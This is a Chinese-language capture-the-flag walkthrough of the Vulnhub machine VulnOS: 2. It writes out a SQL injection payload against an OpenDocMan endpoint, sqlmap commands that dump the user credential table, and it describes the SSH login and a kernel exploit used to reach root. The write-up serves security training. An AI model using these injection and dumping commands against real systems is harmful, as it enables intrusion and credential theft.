Vulnhub靶机 VULNOS: 2 writeup

下载地址:https://www.vulnhub.com/entry/vulnos-2,147/

Vulnhub靶机 VULNOS: 2 writeup_第1张图片

信息搜集

获取IP地址

Vulnhub靶机 VULNOS: 2 writeup_第2张图片

扫描端口

Vulnhub靶机 VULNOS: 2 writeup_第3张图片

80端口

Vulnhub靶机 VULNOS: 2 writeup_第4张图片
点击website跳转到/jabc
Vulnhub靶机 VULNOS: 2 writeup_第5张图片
在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/
Vulnhub靶机 VULNOS: 2 writeup_第6张图片
Vulnhub靶机 VULNOS: 2 writeup_第7张图片
访问/jabcd0cs/
Vulnhub靶机 VULNOS: 2 writeup_第8张图片
在/jabcd0cs/发现CMS的版本,使用searchsploit查询
在这里插入图片描述
Vulnhub靶机 VULNOS: 2 writeup_第9张图片
这里看到了pyload

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

可以利用
Vulnhub靶机 VULNOS: 2 writeup_第10张图片
使用sqlmap跑库

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 --dbs

Vulnhub靶机 VULNOS: 2 writeup_第11张图片
跑表名

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs --tables

Vulnhub靶机 VULNOS: 2 writeup_第12张图片
在odm_user表里面发现了有用户名密码

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs -T odm_user --dump

Vulnhub靶机 VULNOS: 2 writeup_第13张图片
将获取的哈希值解密
Vulnhub靶机 VULNOS: 2 writeup_第14张图片

getshell

使用获取的用户名密码尝试登录ssh,使用webmin用户登录成功
Vulnhub靶机 VULNOS: 2 writeup_第15张图片

提权

查看系统版本,内核版本
Vulnhub靶机 VULNOS: 2 writeup_第16张图片
使用searchsploit查询找到一个符合条件的exp
在这里插入图片描述
将exp上传到靶机,赋予可执行权限,编译并执行,成功获取root权限
Vulnhub靶机 VULNOS: 2 writeup_第17张图片
拿到root目录下的flag
Vulnhub靶机 VULNOS: 2 writeup_第18张图片
到这里成功完成了该靶机!
**本文所有用到的工具都可以关注微信公众号“网络安全学习爱好者”联系公众客服免费领取! **
Vulnhub靶机 VULNOS: 2 writeup_第19张图片

你可能感兴趣的:(vulnhub靶机,安全,linux,web安全)